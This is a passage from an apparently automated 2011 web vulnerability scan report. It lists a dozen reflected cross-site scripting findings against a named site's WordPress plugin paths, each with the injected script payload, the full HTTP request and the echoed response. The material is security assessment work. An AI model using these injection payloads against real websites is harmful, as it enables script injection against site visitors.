The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ac14"><script>alert(1)</script>36c637fbf14 was submitted in the REST URL parameter 2. This input was echoed as 4ac14\"><script>alert(1)</script>36c637fbf14 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins4ac14"><script>alert(1)</script>36c637fbf14/sexybookmarks/js/shareaholic-publishers.min.js HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:17:21 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:17:22 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins4ac14\"><script>alert(1)</script>36c637fbf14/sexybookmarks/js/shareaholic-publishers.min.js" type="hidden" />
...[SNIP]...

1.174. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11f79"><script>alert(1)</script>bf35875d5a0 was submitted in the REST URL parameter 3. This input was echoed as 11f79\"><script>alert(1)</script>bf35875d5a0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sexybookmarks11f79"><script>alert(1)</script>bf35875d5a0/js/shareaholic-publishers.min.js HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:17:45 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:17:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/sexybookmarks11f79\"><script>alert(1)</script>bf35875d5a0/js/shareaholic-publishers.min.js" type="hidden" />
...[SNIP]...

1.175. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e773"><script>alert(1)</script>e3669742604 was submitted in the REST URL parameter 4. This input was echoed as 8e773\"><script>alert(1)</script>e3669742604 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sexybookmarks/js8e773"><script>alert(1)</script>e3669742604/shareaholic-publishers.min.js HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:18:16 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:18:17 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js8e773\"><script>alert(1)</script>e3669742604/shareaholic-publishers.min.js" type="hidden" />
...[SNIP]...

1.176. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload caf20"><script>alert(1)</script>4eec3538e5e was submitted in the REST URL parameter 5. This input was echoed as caf20\"><script>alert(1)</script>4eec3538e5e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.jscaf20"><script>alert(1)</script>4eec3538e5e HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:18:49 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:18:51 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.jscaf20\"><script>alert(1)</script>4eec3538e5e" type="hidden" />
...[SNIP]...

1.177. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d752a"><script>alert(1)</script>cab60ad3b7f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d752a\"><script>alert(1)</script>cab60ad3b7f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js?d752a"><script>alert(1)</script>cab60ad3b7f=1 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:15:56 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Mon, 31 Jan 2011 20:15:56 GMT
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js?d752a\"><script>alert(1)</script>cab60ad3b7f=1" type="hidden" />
...[SNIP]...

1.178. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da531"><script>alert(1)</script>024e2ce4755 was submitted in the REST URL parameter 1. This input was echoed as da531\"><script>alert(1)</script>024e2ce4755 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /da531"><script>alert(1)</script>024e2ce4755/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:18:05 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:18:06 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/da531\"><script>alert(1)</script>024e2ce4755/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2" type="hidden" />
...[SNIP]...

1.179. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d84c"><script>alert(1)</script>bd0d34dbf9f was submitted in the REST URL parameter 2. This input was echoed as 2d84c\"><script>alert(1)</script>bd0d34dbf9f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins2d84c"><script>alert(1)</script>bd0d34dbf9f/sexybookmarks/js/shareaholic-publishers.min.js/page/2 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:18:38 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:18:38 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47467

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins2d84c\"><script>alert(1)</script>bd0d34dbf9f/sexybookmarks/js/shareaholic-publishers.min.js/page/2" type="hidden" />
...[SNIP]...

1.180. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f8ee"><script>alert(1)</script>455db0072e6 was submitted in the REST URL parameter 3. This input was echoed as 1f8ee\"><script>alert(1)</script>455db0072e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sexybookmarks1f8ee"><script>alert(1)</script>455db0072e6/js/shareaholic-publishers.min.js/page/2 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:19:10 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:19:11 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47467

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/sexybookmarks1f8ee\"><script>alert(1)</script>455db0072e6/js/shareaholic-publishers.min.js/page/2" type="hidden" />
...[SNIP]...

1.181. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1bd8"><script>alert(1)</script>5954009ca3e was submitted in the REST URL parameter 4. This input was echoed as f1bd8\"><script>alert(1)</script>5954009ca3e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sexybookmarks/jsf1bd8"><script>alert(1)</script>5954009ca3e/shareaholic-publishers.min.js/page/2 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:19:34 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:19:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47467

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/sexybookmarks/jsf1bd8\"><script>alert(1)</script>5954009ca3e/shareaholic-publishers.min.js/page/2" type="hidden" />
...[SNIP]...

1.182. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9136f"><script>alert(1)</script>3ea9e8dbbbd was submitted in the REST URL parameter 5. This input was echoed as 9136f\"><script>alert(1)</script>3ea9e8dbbbd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js9136f"><script>alert(1)</script>3ea9e8dbbbd/page/2 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:19:57 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:19:58 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47467

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js9136f\"><script>alert(1)</script>3ea9e8dbbbd/page/2" type="hidden" />
...[SNIP]...

1.183. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c54c"><script>alert(1)</script>11551064c28 was submitted in the REST URL parameter 6. This input was echoed as 2c54c\"><script>alert(1)</script>11551064c28 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page2c54c"><script>alert(1)</script>11551064c28/2 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:20:20 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:20:21 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page2c54c\"><script>alert(1)</script>11551064c28/2" type="hidden" />
...[SNIP]...

1.184. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aff04"><script>alert(1)</script>5685fddf53f was submitted in the REST URL parameter 7. This input was echoed as aff04\"><script>alert(1)</script>5685fddf53f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2aff04"><script>alert(1)</script>5685fddf53f HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:20:28 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:20:29 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2aff04\"><script>alert(1)</script>5685fddf53f" type="hidden" />
...[SNIP]...

1.185. http://www.installsoftware.com/wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a97b2"><script>alert(1)</script>481e6eac7c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a97b2\"><script>alert(1)</script>481e6eac7c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sexybookmarks/js/shareaholic-publishers.min.js/page/2?a97b2"><script>alert(1)</script>481e6eac7c6=1 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:17:11 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
WWW-Authenticate: Basic realm="Restricted Area"
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Mon, 31 Jan 2011 20:17:12 GMT
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47505

